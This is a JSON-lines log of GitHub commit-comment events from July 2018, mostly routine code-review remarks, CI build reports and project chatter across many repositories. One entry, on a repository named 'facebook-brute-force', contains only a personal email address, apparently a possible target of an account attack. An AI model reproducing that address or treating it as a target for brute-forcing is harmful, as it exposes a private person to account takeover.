{"id":"7932533328","type":"CommitCommentEvent","actor":{"login":"locutus2"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29630060,"position":null,"line":null,"path":null,"commit_id":"bb89b3892c0521a69e6a1b8c832c97ec1a4137e9","created_at":"2018-07-07T15:45:51Z","updated_at":"2018-07-07T15:45:51Z","author_association":"NONE","body":"@candirufish \r\nOr want you only measure progress to see how going further (as i see in my previous post for the purpose of commiting to master this test is off)?"}},"created_at":"2018-07-07T15:45:51Z"}
{"id":"7932533370","type":"CommitCommentEvent","actor":{"login":"Alexander-Miller"},"repo":{"name":"Alexander-Miller/pfuture"},"payload":{"comment":{"id":29630061,"position":null,"line":null,"path":null,"commit_id":"ec06210b7ddf7a69275879a08b26c1cc7189a03a","created_at":"2018-07-07T15:45:53Z","updated_at":"2018-07-07T15:45:53Z","author_association":"OWNER","body":"Ok, I hadn't considered that. For my single use-cases with treemacs I'm outputting an alist that's directly passed to the elisp interpreter.\r\n\r\nI've now pushed a first commit where the output is collected in a buffer (that's killed by pfuture) instead of a process property, but the remaining API is still the same. IMO a slight redesign is in order. I probably don't need to collect the output myself since `buffer-string` returns one whole string anyway. Instead of the output I can provide the process buffer and also offer a utility function that just calls `(with-current-buffer ... (buffer-string))`."}},"created_at":"2018-07-07T15:45:53Z"}
{"id":"7932534867","type":"CommitCommentEvent","actor":{"login":"vondele"},"repo":{"name":"vondele/Stockfish"},"payload":{"comment":{"id":29630066,"position":null,"line":null,"path":null,"commit_id":"fbbc57c77902059c82393feb6ad5cb431666490e","created_at":"2018-07-07T15:47:06Z","updated_at":"2018-07-07T15:47:06Z","author_association":"OWNER","body":"actually somewhat similar to master, just that the skipsize is computed as msb(idx+1), which grows logarithmic with idx (somewhat slower than master):\r\n# idx skipPhase skipSize\r\n1 0 1\r\n2 0 1 \r\n3 1 2 \r\n4 0 2 \r\n5 1 2 \r\n6 0 2 \r\n7 1 3 \r\n8 2 3 \r\n9 0 3 \r\n10 1 3 \r\n11 2 3 \r\n12 0 3 \r\n13 1 3 \r\n14 2 3 \r\n15 3 4 \r\n16 0 4 \r\n17 1 4 \r\n18 2 4 \r\n19 3 4 \r\n[...]\r\n"}},"created_at":"2018-07-07T15:47:06Z"}
{"id":"7932535321","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630067,"position":null,"line":null,"path":null,"commit_id":"d2b38f5410f15a9c00a1670f8c75e03a31a90ac5","created_at":"2018-07-07T15:47:26Z","updated_at":"2018-07-07T15:47:26Z","author_association":"NONE","body":"d2b38f5"}},"created_at":"2018-07-07T15:47:26Z"}
{"id":"7932535631","type":"CommitCommentEvent","actor":{"login":"Fourdee"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":29630068,"position":null,"line":null,"path":null,"commit_id":"fec06b5e3218a3c2be1ccebcc9f91f77920b9612","created_at":"2018-07-07T15:47:42Z","updated_at":"2018-07-07T15:47:42Z","author_association":"OWNER","body":"@MichaIng \r\n\r\n> I will go through the code again to check for inconsistencies. Sorry for the mess that this colour change caused \r\n\r\nNo worries, these things happen 👍, we simply cant test every possible situation. Please if you could would be great, I'am wrapping up some other tickets."}},"created_at":"2018-07-07T15:47:42Z"}
{"id":"7932537071","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630070,"position":null,"line":null,"path":null,"commit_id":"94b909b93a4bae7b36b6a2f0513764e2bbb0c44e","created_at":"2018-07-07T15:48:48Z","updated_at":"2018-07-07T15:48:48Z","author_association":"NONE","body":"94b909b"}},"created_at":"2018-07-07T15:48:48Z"}
{"id":"7932537588","type":"CommitCommentEvent","actor":{"login":"Plabon21"},"repo":{"name":"MarcoFarrier/FacebookHackerCup2018"},"payload":{"comment":{"id":29630072,"position":null,"line":null,"path":null,"commit_id":"1b1a7cf334e6c0b0c5881b47a800a2b214f11617","created_at":"2018-07-07T15:49:13Z","updated_at":"2018-07-07T15:49:13Z","author_association":"NONE","body":"thank you.\r\n"}},"created_at":"2018-07-07T15:49:13Z"}
{"id":"7932537827","type":"CommitCommentEvent","actor":{"login":"davidtrpcevski"},"repo":{"name":"Cardinal-AOSP/frameworks_base"},"payload":{"comment":{"id":29630073,"position":null,"line":null,"path":null,"commit_id":"40ffb0ef1e181b90acf6aac23c98ae4f208d946a","created_at":"2018-07-07T15:49:24Z","updated_at":"2018-07-07T15:49:24Z","author_association":"NONE","body":"This shouldn't be merged just yet. Causes issues on HSDPA+ and LTE networks.  "}},"created_at":"2018-07-07T15:49:24Z"}
{"id":"7932539861","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630075,"position":null,"line":null,"path":null,"commit_id":"1fdc728882bccbf0946d33c215b74b689b28fad1","created_at":"2018-07-07T15:51:03Z","updated_at":"2018-07-07T15:51:03Z","author_association":"NONE","body":"1fdc728"}},"created_at":"2018-07-07T15:51:03Z"}
{"id":"7932541348","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630077,"position":75,"line":102,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:52:12Z","updated_at":"2018-07-07T15:52:12Z","author_association":"OWNER","body":"This line sends the notification throughout the app, and sends the message to observers."}},"created_at":"2018-07-07T15:52:12Z"}
{"id":"7932542078","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630079,"position":87,"line":116,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:52:45Z","updated_at":"2018-07-07T15:52:45Z","author_association":"OWNER","body":"This listens for a tap anywhere in the page and calls the \r\n\r\n!!important note:\r\n\r\n`#selector(<func>)`  is the correct way"}},"created_at":"2018-07-07T15:52:45Z"}
{"id":"7932542458","type":"CommitCommentEvent","actor":{"login":"thangngoc89"},"repo":{"name":"astrada/ppx_bs_css"},"payload":{"comment":{"id":29630080,"position":null,"line":null,"path":null,"commit_id":"15c5c703af7fe504da3b3d16d39816af990018b3","created_at":"2018-07-07T15:53:03Z","updated_at":"2018-07-07T15:53:03Z","author_association":"NONE","body":"Hello, I just tried this commit and the issue wasn't fixed somehow. It still produces `[| `zero]`"}},"created_at":"2018-07-07T15:53:03Z"}
{"id":"7932542529","type":"CommitCommentEvent","actor":{"login":"rakeshvadde6"},"repo":{"name":"Naveenramchowdary/codedeploy-app"},"payload":{"comment":{"id":29630081,"position":null,"line":null,"path":null,"commit_id":"02cf0f1d25757e7123e40566f2639631efde1910","created_at":"2018-07-07T15:53:07Z","updated_at":"2018-07-07T15:53:07Z","author_association":"NONE","body":"wdkfgdsjhk"}},"created_at":"2018-07-07T15:53:07Z"}
{"id":"7932542696","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630082,"position":90,"line":119,"path":"ChatApp/Controller/RegisterVC.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:53:14Z","updated_at":"2018-07-07T15:53:14Z","author_association":"OWNER","body":"`@objc` is important if you're calling something by #selector so that we know that this is an objc instance call."}},"created_at":"2018-07-07T15:53:14Z"}
{"id":"7932543485","type":"CommitCommentEvent","actor":{"login":"rapicastillo"},"repo":{"name":"rapicastillo/swift-chat-app"},"payload":{"comment":{"id":29630083,"position":17,"line":37,"path":"ChatApp/Services/UserDataService.swift","commit_id":"9cad2c0b13a61eac2e210f4739cefc289c2478ec","created_at":"2018-07-07T15:53:51Z","updated_at":"2018-07-07T15:53:51Z","author_association":"OWNER","body":"Instead of going throught he long process of parsing json manually using the fucking Scanner, use swifty json instead"}},"created_at":"2018-07-07T15:53:51Z"}
{"id":"7932543624","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630085,"position":null,"line":null,"path":null,"commit_id":"273e3fb11e4f422c444ed0eafefa24e3561521f5","created_at":"2018-07-07T15:53:58Z","updated_at":"2018-07-07T15:53:58Z","author_association":"NONE","body":"273e3fb"}},"created_at":"2018-07-07T15:53:58Z"}
{"id":"7932545476","type":"CommitCommentEvent","actor":{"login":"sticilface"},"repo":{"name":"espressif/arduino-esp32"},"payload":{"comment":{"id":29630086,"position":62,"line":92,"path":"libraries/WiFi/src/WiFiClient.cpp","commit_id":"9efecc1be03a7f319df1d86b58f56ae73a6ae510","created_at":"2018-07-07T15:55:27Z","updated_at":"2018-07-07T15:55:27Z","author_association":"CONTRIBUTOR","body":"Can’t believe I didn’t know that after all this time. Oops! "}},"created_at":"2018-07-07T15:55:27Z"}
{"id":"7932546227","type":"CommitCommentEvent","actor":{"login":"Yivan"},"repo":{"name":"pimcore/pimcore"},"payload":{"comment":{"id":29630092,"position":null,"line":null,"path":null,"commit_id":"2c24923c5a011f767e3894c3a6c0cf5238332d73","created_at":"2018-07-07T15:56:02Z","updated_at":"2018-07-07T15:56:02Z","author_association":"CONTRIBUTOR","body":"@brush I should add that redis.conf file doesn't support comments in the same line than config.\r\nMy redis server didn't restart because i copied the code provided as it for fast test.\r\n\r\nI think to prevent people having same problem, the config snippet code should be something like that (i fill some questions in the comments please adapt it ; ) ):\r\n```\r\n# depending on your data:\r\nmaxmemory 1gb                   \r\n# IMPORTANT (maybe some hints why important... does it don't work at all with other methods, for instance allkeys-lru is a standard for redis too, or it just to optimize performance as you use expire keys):\r\nmaxmemory-policy volatile-lru\r\n# Maybe some hints why this is needed (important too ? i think because no persistance so better perf.):\r\nsave \"\"\r\n```\r\n\r\nThanks!"}},"created_at":"2018-07-07T15:56:02Z"}
{"id":"7932547186","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630093,"position":null,"line":null,"path":null,"commit_id":"35e556ded993b75b6262899f6a20c1a40347f6ba","created_at":"2018-07-07T15:56:47Z","updated_at":"2018-07-07T15:56:47Z","author_association":"NONE","body":"35e556d"}},"created_at":"2018-07-07T15:56:47Z"}
{"id":"7932549116","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630100,"position":null,"line":null,"path":null,"commit_id":"35e556ded993b75b6262899f6a20c1a40347f6ba","created_at":"2018-07-07T15:58:19Z","updated_at":"2018-07-07T15:58:19Z","author_association":"NONE","body":"35e556d"}},"created_at":"2018-07-07T15:58:19Z"}
{"id":"7932549775","type":"CommitCommentEvent","actor":{"login":"jankatins"},"repo":{"name":"mara/data-integration"},"payload":{"comment":{"id":29630101,"position":12,"line":17,"path":"data_integration/pipelines.py","commit_id":"28807621e6b4ec75248981f45fdacc5d7259000e","created_at":"2018-07-07T15:58:50Z","updated_at":"2018-07-07T15:58:50Z","author_association":"MEMBER","body":"I haven't found a place where this was used"}},"created_at":"2018-07-07T15:58:50Z"}
{"id":"7932549948","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630102,"position":14,"line":86,"path":"rootdir/etc/init.target.rc","commit_id":"ab9d51f3e4a26fab4c4a258472e46b76b9d41064","created_at":"2018-07-07T15:58:59Z","updated_at":"2018-07-07T15:58:59Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-07T15:58:59Z"}
{"id":"7932550029","type":"CommitCommentEvent","actor":{"login":"sabran125"},"repo":{"name":"kallewoof/btcdeb"},"payload":{"comment":{"id":29630103,"position":null,"line":null,"path":null,"commit_id":"35e556ded993b75b6262899f6a20c1a40347f6ba","created_at":"2018-07-07T15:59:03Z","updated_at":"2018-07-07T15:59:03Z","author_association":"NONE","body":"35e556d"}},"created_at":"2018-07-07T15:59:03Z"}
{"id":"7932550051","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630104,"position":6,"line":6,"path":"rootdir/Android.mk","commit_id":"ab9d51f3e4a26fab4c4a258472e46b76b9d41064","created_at":"2018-07-07T15:59:05Z","updated_at":"2018-07-07T15:59:05Z","author_association":"CONTRIBUTOR","body":"done"}},"created_at":"2018-07-07T15:59:05Z"}
{"id":"7932552275","type":"CommitCommentEvent","actor":{"login":"Akianonymus"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630115,"position":14,"line":86,"path":"rootdir/etc/init.target.rc","commit_id":"ab9d51f3e4a26fab4c4a258472e46b76b9d41064","created_at":"2018-07-07T16:00:32Z","updated_at":"2018-07-07T16:00:32Z","author_association":"CONTRIBUTOR","body":"Just force pushed \r\n\r\nNew commit \r\nhttps://github.com/Harpia-development/device_motorola_harpia/commit/b06fa25af5134f9c2e0559041422a5a8e4b6fb98"}},"created_at":"2018-07-07T16:00:32Z"}
{"id":"7932552364","type":"CommitCommentEvent","actor":{"login":"lzzy12"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29630116,"position":null,"line":null,"path":null,"commit_id":"268a84a71f47f5621df1cb0c9b0c1c7c7f5c7382","created_at":"2018-07-07T16:00:35Z","updated_at":"2018-07-07T16:00:35Z","author_association":"COLLABORATOR","body":"I created it for myself ;)"}},"created_at":"2018-07-07T16:00:35Z"}
{"id":"7932552409","type":"CommitCommentEvent","actor":{"login":"Jeevuz"},"repo":{"name":"dmdevgo/RxPM"},"payload":{"comment":{"id":29630117,"position":3,"line":2,"path":"build.gradle","commit_id":"b159d4e16d1c1b4d4c941e1f5e1dfeaceb73ba36","created_at":"2018-07-07T16:00:37Z","updated_at":"2018-07-07T16:00:37Z","author_association":"COLLABORATOR","body":"1.2.51 последняя сейчас"}},"created_at":"2018-07-07T16:00:37Z"}
{"id":"7932557650","type":"CommitCommentEvent","actor":{"login":"LeeChiHoon"},"repo":{"name":"LeeChiHoon/dokgo"},"payload":{"comment":{"id":29630126,"position":null,"line":null,"path":null,"commit_id":"ff85806e4279c7b8e7ea786c69c1933f85751a6e","created_at":"2018-07-07T16:04:38Z","updated_at":"2018-07-07T16:04:38Z","author_association":"OWNER","body":"start"}},"created_at":"2018-07-07T16:04:38Z"}
{"id":"7932562121","type":"CommitCommentEvent","actor":{"login":"SubhrajyotiSen"},"repo":{"name":"Harpia-development/device_motorola_harpia"},"payload":{"comment":{"id":29630128,"position":null,"line":null,"path":null,"commit_id":"b06fa25af5134f9c2e0559041422a5a8e4b6fb98","created_at":"2018-07-07T16:07:58Z","updated_at":"2018-07-07T16:07:58Z","author_association":"CONTRIBUTOR","body":"LGTM"}},"created_at":"2018-07-07T16:07:58Z"}
{"id":"7932562244","type":"CommitCommentEvent","actor":{"login":"Martyshko"},"repo":{"name":"Martyshko/martyshkoal.github.io"},"payload":{"comment":{"id":29630129,"position":null,"line":null,"path":null,"commit_id":"a331d337ff24cdd692da0a6e746171438efeab2b","created_at":"2018-07-07T16:08:03Z","updated_at":"2018-07-07T16:08:03Z","author_association":"OWNER","body":"ready"}},"created_at":"2018-07-07T16:08:03Z"}
{"id":"7932568591","type":"CommitCommentEvent","actor":{"login":"narendrakundlaa"},"repo":{"name":"narendrakundlaa/Angular5"},"payload":{"comment":{"id":29630141,"position":18,"line":18,"path":".vscode/launch.json","commit_id":"91ecb0553b21d465ecdb0cc5952b9cd2cfc0c7a7","created_at":"2018-07-07T16:12:47Z","updated_at":"2018-07-07T16:12:47Z","author_association":"OWNER","body":"hello"}},"created_at":"2018-07-07T16:12:47Z"}
{"id":"7932568819","type":"CommitCommentEvent","actor":{"login":"eaxvac"},"repo":{"name":"eaxvac/Harepacker-resurrected"},"payload":{"comment":{"id":29630142,"position":null,"line":null,"path":null,"commit_id":"54ab129df48ad58c9b028a6464474419025e7404","created_at":"2018-07-07T16:12:59Z","updated_at":"2018-07-07T16:12:59Z","author_association":"OWNER","body":"ie\r\n\r\n![show all rendering errors at once](https://user-images.githubusercontent.com/4586194/42412687-a841caa0-8243-11e8-8b94-d5b6f295b90d.png)\r\n"}},"created_at":"2018-07-07T16:12:59Z"}
{"id":"7932570845","type":"CommitCommentEvent","actor":{"login":"candirufish"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29630147,"position":null,"line":null,"path":null,"commit_id":"bb89b3892c0521a69e6a1b8c832c97ec1a4137e9","created_at":"2018-07-07T16:14:32Z","updated_at":"2018-07-07T16:14:32Z","author_association":"OWNER","body":"I like too see how it fares vs the original patch, some things have already changed, so I would like to run this test for information purpose also, and if it fails there is no point on rebasing it on the master. Plus this is pre-prepared, I don't have much time or even the pc for rebasing on the master today :-)"}},"created_at":"2018-07-07T16:14:32Z"}
{"id":"7932571507","type":"CommitCommentEvent","actor":{"login":"Clownacy"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":29630149,"position":null,"line":null,"path":null,"commit_id":"7af5a0cdf484b0d6534024d02e07eda16340a50f","created_at":"2018-07-07T16:15:07Z","updated_at":"2018-07-07T16:15:07Z","author_association":"CONTRIBUTOR","body":"Hate to be awkward, but I figured out the cause of the 'multiply defined' error I got when I attempted to do this myself.\r\n\r\nFor me (MSYS2 MinGW-w64), I had to have HAVE_FSEEKO defined when building libFLAC, or fseeko and ftello would be redefined as fseeko64 and ftello64. I'd open a pull request to fix this, but we had a similar problem with alloca.h, [back when I made the SDL2 build](https://github.com/ekeeke/Genesis-Plus-GX/pull/114) and me forcefully defining that fixed building on Lubuntu, but broke MinGW. Any input?"}},"created_at":"2018-07-07T16:15:07Z"}
{"id":"7932571513","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29630150,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-07T16:15:07Z","updated_at":"2018-07-07T16:15:07Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2841 of 2970 tests passed, 45 test warnings)\n\nMessages:\n\n * 15 tests had: AUD diffs.\n * 99 tests had: EIO diffs.\n * 109 tests had: ESO small diffs.\n * 2 tests had: Table small diffs.\n * 157 tests had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 127 tests had: Table big diffs.\n * 151 tests had: MDD diffs.\n * 158 tests had: MTD diffs.\n * 151 tests had: RDD diffs.\n * 90 tests had: MTR small diffs.\n * 3 tests had: MTR big diffs.\n * 5 tests had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 514\n * Failed: 129\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-95.66%25-yellow.png)</a> \n"}},"created_at":"2018-07-07T16:15:07Z"}
{"id":"7932575891","type":"CommitCommentEvent","actor":{"login":"jmillz88"},"repo":{"name":"themastersunil/facebook-brute-force"},"payload":{"comment":{"id":29630159,"position":null,"line":null,"path":null,"commit_id":"260162cd06bb203a9cdce458dc96ff38852bb214","created_at":"2018-07-07T16:18:14Z","updated_at":"2018-07-07T16:18:14Z","author_association":"NONE","body":"lowenberglacey@gmail.com"}},"created_at":"2018-07-07T16:18:14Z"}
{"id":"7932578104","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29630164,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-07T16:19:58Z","updated_at":"2018-07-07T16:19:58Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-07T16:19:58Z"}
{"id":"7932589956","type":"CommitCommentEvent","actor":{"login":"cesarariza24"},"repo":{"name":"carlooos28/repo-clasegit-grupo-104"},"payload":{"comment":{"id":29630183,"position":null,"line":null,"path":null,"commit_id":"52376e7074cd911235dc58d1762c1f730d77d823","created_at":"2018-07-07T16:29:15Z","updated_at":"2018-07-07T16:29:15Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Elaborar Readme Inicial](https://trello.com/c/4KvxBZMA/5-elaborar-readme-inicial)"}},"created_at":"2018-07-07T16:29:15Z"}
{"id":"7932600429","type":"CommitCommentEvent","actor":{"login":"theCakePalette"},"repo":{"name":"theCakePalette/theCakePalette.github.io"},"payload":{"comment":{"id":29630200,"position":null,"line":null,"path":null,"commit_id":"c1cf43a9f1432b9a3b1aa8db61b7f8f5ba384280","created_at":"2018-07-07T16:36:33Z","updated_at":"2018-07-07T16:36:33Z","author_association":"OWNER","body":"thecakepalette.com\r\nwww.thecakepalette.com"}},"created_at":"2018-07-07T16:36:33Z"}
{"id":"7932602384","type":"CommitCommentEvent","actor":{"login":"SyahirahWanMin"},"repo":{"name":"SyahirahWanMin/test"},"payload":{"comment":{"id":29630201,"position":null,"line":null,"path":null,"commit_id":"c0a152d4d170453aec1d92d6ef3e8632954af9fe","created_at":"2018-07-07T16:38:03Z","updated_at":"2018-07-07T16:38:03Z","author_association":"OWNER","body":"Test"}},"created_at":"2018-07-07T16:38:03Z"}
{"id":"7932602958","type":"CommitCommentEvent","actor":{"login":"SyahirahWanMin"},"repo":{"name":"SyahirahWanMin/test"},"payload":{"comment":{"id":29630202,"position":null,"line":null,"path":null,"commit_id":"c0a152d4d170453aec1d92d6ef3e8632954af9fe","created_at":"2018-07-07T16:38:28Z","updated_at":"2018-07-07T16:38:28Z","author_association":"OWNER","body":"Test\r\n[cost.txt](https://github.com/SyahirahWanMin/test/files/2172914/cost.txt)\r\n"}},"created_at":"2018-07-07T16:38:28Z"}
{"id":"7932606663","type":"CommitCommentEvent","actor":{"login":"Esenxd"},"repo":{"name":"Robelon1995/Toshinou-Community"},"payload":{"comment":{"id":29630207,"position":5,"line":103,"path":"src/js/Api.js","commit_id":"fe51c8ce7407b2f2e1c9348954c67511febc8119","created_at":"2018-07-07T16:41:08Z","updated_at":"2018-07-07T16:41:08Z","author_association":"NONE","body":"+    if (!window.settings.collectBoxes && !window.settings.collectEventBoxes && !window.settings.collectHybridAlloy && !window.settings.collectMaterials && !window.settings.collectMayhem && !window.settings.collectCargo && !window.settings.collectGreenOrGoldBooty && !window.settings.collectBlueBooty && !window.settings.collectRedBooty && !window.settings.collectMasqueBooty)\r\n"}},"created_at":"2018-07-07T16:41:08Z"}
{"id":"7932607166","type":"CommitCommentEvent","actor":{"login":"amitabhleo"},"repo":{"name":"amitabhleo/aleo8"},"payload":{"comment":{"id":29630208,"position":2,"line":2,"path":"README.md","commit_id":"a30e28a4768007ec47db5ba5f1c69ea998dff3a9","created_at":"2018-07-07T16:41:30Z","updated_at":"2018-07-07T16:41:30Z","author_association":"OWNER","body":"Oh will this update in the comment"}},"created_at":"2018-07-07T16:41:30Z"}
{"id":"7932609825","type":"CommitCommentEvent","actor":{"login":"jeroen"},"repo":{"name":"eddelbuettel/rprotobuf"},"payload":{"comment":{"id":29630210,"position":5,"line":5,"path":"ChangeLog","commit_id":"868ad27b2f6028827f2f36fa531ef58287fa72db","created_at":"2018-07-07T16:43:24Z","updated_at":"2018-07-07T16:43:24Z","author_association":"COLLABORATOR","body":"Could you push out a release with this fix one of these days? I'm trying to get the failure-list down before pushing the new rtools to cran."}},"created_at":"2018-07-07T16:43:24Z"}
{"id":"7932610753","type":"CommitCommentEvent","actor":{"login":"slmatthew"},"repo":{"name":"danyadev/vk-desktop-app"},"payload":{"comment":{"id":29630211,"position":5,"line":53,"path":"renderer/js/init.js","commit_id":"819b4a459dc9b03189a03d08dba9660be378ddc9","created_at":"2018-07-07T16:44:08Z","updated_at":"2018-07-07T16:44:08Z","author_association":"NONE","body":"А может сделать окно с предложением пользователю согласиться на сообщения от группы?"}},"created_at":"2018-07-07T16:44:08Z"}
{"id":"7932614820","type":"CommitCommentEvent","actor":{"login":"slmatthew"},"repo":{"name":"danyadev/vk-desktop-app"},"payload":{"comment":{"id":29630216,"position":58,"line":147,"path":"renderer/js/modules/news.js","commit_id":"819b4a459dc9b03189a03d08dba9660be378ddc9","created_at":"2018-07-07T16:47:09Z","updated_at":"2018-07-07T16:47:09Z","author_association":"NONE","body":"Не **прикрепления**, а **вложения**"}},"created_at":"2018-07-07T16:47:09Z"}
{"id":"7932620133","type":"CommitCommentEvent","actor":{"login":"Yousha"},"repo":{"name":"phingofficial/phing"},"payload":{"comment":{"id":29630220,"position":4,"line":1527,"path":"classes/phing/Phing.php","commit_id":"342b86b6a62ec02067e203a6b2b09c953d0079dc","created_at":"2018-07-07T16:51:15Z","updated_at":"2018-07-07T16:51:15Z","author_association":"NONE","body":"Why not use `DIRECTORY_SEPARATOR` ?"}},"created_at":"2018-07-07T16:51:15Z"}
{"id":"7932621103","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"drewyh/EnergyPlus"},"payload":{"comment":{"id":29630222,"position":null,"line":null,"path":null,"commit_id":"e842f9580efe872b8e79a0e19fec5a3e1e253a7a","created_at":"2018-07-07T16:52:05Z","updated_at":"2018-07-07T16:52:05Z","author_association":"NONE","body":"oo_boiler_refactor (drewyh) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1682 of 1682 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e842f9580efe872b8e79a0e19fec5a3e1e253a7a-PR6728-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.16%25-green.png)</a>\n"}},"created_at":"2018-07-07T16:52:05Z"}
{"id":"7932621501","type":"CommitCommentEvent","actor":{"login":"XDKlein"},"repo":{"name":"XDKlein/forth"},"payload":{"comment":{"id":29630223,"position":null,"line":null,"path":null,"commit_id":"51877656640bb9a6e1e411dba7c7d71c67aa2ea8","created_at":"2018-07-07T16:52:22Z","updated_at":"2018-07-07T16:52:22Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Системы: располагать системы в по определенному галактическому рисунку.](https://trello.com/c/QBhDgsTo/43-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D1%80%D0%B0%D1%81%D0%BF%D0%BE%D0%BB%D0%B0%D0%B3%D0%B0%D1%82%D1%8C-%D1%81%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D1%8B-%D0%B2-%D0%BF%D0%BE-%D0%BE%D0%BF%D1%80%D0%B5%D0%B4%D0%B5%D0%BB%D0%B5%D0%BD%D0%BD%D0%BE%D0%BC%D1%83-%D0%B3%D0%B0%D0%BB%D0%B0%D0%BA%D1%82%D0%B8%D1%87%D0%B5%D1%81%D0%BA%D0%BE%D0%BC%D1%83-%D1%80%D0%B8%D1%81%D1%83%D0%BD%D0%BA%D1%83)"}},"created_at":"2018-07-07T16:52:22Z"}
